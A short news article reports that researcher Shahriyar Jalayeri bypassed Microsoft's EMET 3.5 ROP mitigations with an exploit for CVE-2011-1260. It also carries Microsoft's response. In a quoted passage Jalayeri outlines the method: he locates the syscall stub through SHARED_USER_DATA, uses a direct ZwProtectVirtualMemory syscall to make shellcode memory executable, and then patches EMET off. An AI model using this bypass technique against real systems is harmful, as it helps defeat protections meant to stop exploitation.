A security researcher has admitted that he has managed to crack the ROPGuard tool that won second prize at the recent Microsoft BlueHat contest.
According to Arstechnica, security researcher Shahriyar Jalayeri has demonstrated an exploit that bypasses the tool's protection. According to a blog, Jalayeri said that he managed to bypass EMET 3.5 and wrote a full-functioning exploit for CVE-2011-1260 with all Enhanced Mitigation Experience Toolkit's (EMET) ROP mitigation enabled.
According to Microsoft, the EMET is a utility that helps prevent vulnerabilities in software from being successfully exploited. However Jalayeri said that EMET's ROP mitigation works by hooking certain APIs (such as VirtualProtect) with Shim Engine, and monitors their initialisation.
He said: “I have used SHARED_USER_DATA ,which mapped at fixed address ‘0x7FFE0000' to find KiFastSystemCall address (SystemCallStub at ‘0x7FFE0300'), so I could call any syscall by now.
“By calling ZwProtectVirtualMemory's SYSCALL ‘0x0D7', I made shellcode's memory address RWX. After this step I could execute any instruction I wanted. But to execute actual shellcode (with hooked APIs such as ‘WinExec') I did patch EMET to be deactivated completely.”
Jalayeri posted an ASM code and the exploit on his blog, as well as a video that showed a Windows 7 machine falling prey to a ROP-induced exploit, even though the OS was running version 3.5 of EMET.
ROPGuard was developed by University of Zagreb researcher Ivan Fratric who won a $50,000 (£32,000) for his submission.
Yunsun Wee, director of Microsoft Trustworthy Computing, said in a statement to Arstechnica: “The security mitigation technologies implemented by EMET increase the cost for attackers to develop a successful exploit.”